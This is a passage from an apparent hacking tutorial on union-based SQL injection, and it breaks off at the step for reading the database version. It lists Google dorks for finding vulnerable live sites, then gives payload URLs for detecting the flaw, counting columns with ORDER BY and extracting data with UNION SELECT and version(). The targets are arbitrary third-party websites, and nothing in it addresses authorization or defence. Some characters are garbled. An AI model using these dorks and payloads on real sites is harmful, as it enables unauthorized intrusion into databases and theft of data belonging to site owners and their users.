Union Based SQLI
Union Based SQLI
Requirements :-
? SQL Injection Dorks.
? Vulnerable Website.
? Firefox with Hack bar add-on.
? Little bit understanding of SQL
? Fresh Mind to Understand it
Step 1. Find Vulnerable website.
An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)
First you search the SQLi vulnerable web site. For searching vulnerable web page you take the help of google . Open your google page and use following script.Use any one of the following…
? “inurl:php?id=”
? “inurl:customer/board.htm?mode=”
? “inurl:productlist.php?tid=”
? “inurl:product-list.php?id=”
? “inurl: product.php?shopprodid=”
? “inurl: garden_equipment/Fruit-Cage/product.php?pr=”
? “inurl: onlinesales/product.php?product_id=”
How to Check for Vulnerability.
To Check the Vulnerability put sigle Quote ( ) at the end of the website URL and Hit Enter.If the page remains same or Not found then its not vulnerable and if the page shows Error like this :-
An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near /contentPage.php?id=8 at line 1
This means the website is vulnerable to SQL Injection.
Step 2. Find the number of Columns.
Wooo hoo hoo !! We found SQL Injection Vulnerable webstie now its time to find no. of Columns present in the Database.
To do that replace that one single quote ( ) with Order By no. Statement until you find the Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like Unknown Column
Example:
www.targetwebsite.com/index.php?id=8 Order by 1
If you get an Error on Order by 9 that means the DB have 8 number of Columns
Step 3. Find the Vulnerable Column.
Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query Union Select columns_sequence.
And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign -before ID.
For Eg. If the Number of Column is 11 then the query is as follow :-
www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11-- ? And Once if the Query has been Executed then it will display the number of Column. Yeahh.... !!
In the Above result, I found three vulnerable Columns 2,3
Step 4. Finding version, Database and User.
Now this time to find out website Database version and User Just replace Vulnerable Column no. with version()
For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--